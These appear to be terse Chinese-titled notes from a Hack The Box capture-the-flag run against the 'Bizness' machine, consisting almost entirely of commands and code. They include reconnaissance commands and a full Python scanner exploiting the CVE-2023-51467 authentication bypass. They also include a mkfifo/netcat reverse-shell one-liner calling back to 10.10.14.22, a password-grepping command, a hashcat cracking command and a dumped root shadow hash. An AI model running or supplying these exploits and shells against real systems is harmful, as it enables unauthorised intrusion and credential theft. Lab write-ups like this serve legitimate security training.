HTB-Bizness笔记

nmap -sC -sV -T4 -Pn 10.10.11.252

echo "10.10.11.252 bizness.htb" | sudo tee -a /etc/hosts

dirsearch -u https://bizness.htb/

import osimport argparseimport requestsimport concurrent.futures
from threading import Lockfrom rich.console import Consolefrom typing import List, Optionalfrom urllib.parse import urlparsefrom alive_progress import alive_barfrom requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)console = Console()

class CVE_2023_51467:    def __init__(self, urls: List[str], threads: int, output_file: str):        self.urls = urls        self.threads = threads        self.output_file = output_file        self.file_lock = Lock()
    def check_url(self, base_url: str) -> Optional[str]:        parsed_url = urlparse(base_url)        schemes = ["http", "https"] if not parsed_url.scheme else [parsed_url.scheme]        for scheme in schemes:            url = f"{scheme}://{parsed_url.netloc}{parsed_url.path}"            if self.is_url_accessible(url):                return url        return None
    def is_url_accessible(self, url: str) -> bool:        try:            response = requests.head(url, verify=False, timeout=5, allow_redirects=True)            return response.status_code < 500        except requests.RequestException:            return False
    def scan_url(self, base_url: str):        target_url = self.check_url(base_url)
        if target_url:            try:                response = requests.get(                    f"{target_url}/webtools/control/ping?USERNAME&PASSWORD=test&requirePasswordChange=Y",                    verify=False,                    timeout=10,                    allow_redirects=True,                )
                if response.status_code == 200 and "PONG" in response.text:                    console.log(                        f"Vulnerable URL found: {base_url}, Response: {response.text.strip()}"                    )                    vulnerable_url = f"{urlparse(target_url).scheme}://{urlparse(target_url).netloc}n"                    with self.file_lock:                        with open(self.output_file, "a") as file:                            file.write(vulnerable_url)            except Exception as e:                console.log(f"Error scanning {base_url}: {e}")
    def run(self):        with alive_bar(len(self.urls), enrich_print=False) as bar:            with concurrent.futures.ThreadPoolExecutor(                max_workers=self.threads            ) as executor:                future_to_url = {                    executor.submit(self.scan_url, url): url for url in self.urls                }                for _ in concurrent.futures.as_completed(future_to_url):                    bar()

def main():    script_name = os.path.basename(__file__)    parser = argparse.ArgumentParser(        description="CVE-2023-51467 Scanner: Scans URLs for a specific vulnerability associated with CVE-2023-51467.",        epilog=f"Example usage:n"        f"    python {script_name} -u http://example.comn"        f"    python {script_name} -f urls.txt -o output.txt -t 50",        formatter_class=argparse.RawDescriptionHelpFormatter,    )    parser.add_argument("-u", "--url", help="Single URL to send GET request to")    parser.add_argument(        "-f", "--file", help="File containing list of base URLs to scan"    )    parser.add_argument(        "-o",        "--output",        default="output.txt",        help="File to write vulnerable systems to",    )    parser.add_argument(        "-t",        "--threads",        type=int,        default=10,        help="Number of concurrent threads to use",    )    args = parser.parse_args()
    urls = []    if args.file:        with open(args.file, "r") as file:            urls = [line.strip() for line in file]    elif args.url:        urls.append(args.url)    else:        console.log("No URL or file provided")        return
    scanner = CVE_2023_51467(urls, args.threads, args.output)    scanner.run()

if __name__ == "__main__":    main()

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.22 4444 >/tmp/f

grep -arin -o -E '(w+W+){0,5}password(W+w+){0,5}' .

hashcat -m 120 hash /home/ioi/rockyou.txt

root:$y$j9T$pJW9XfkWvA4ozHorBy1kA1$MMNByIaVvdq4YrIpvYDEIfckbiKog11HxKcxJkAZLcA:19709:0:99999:7:::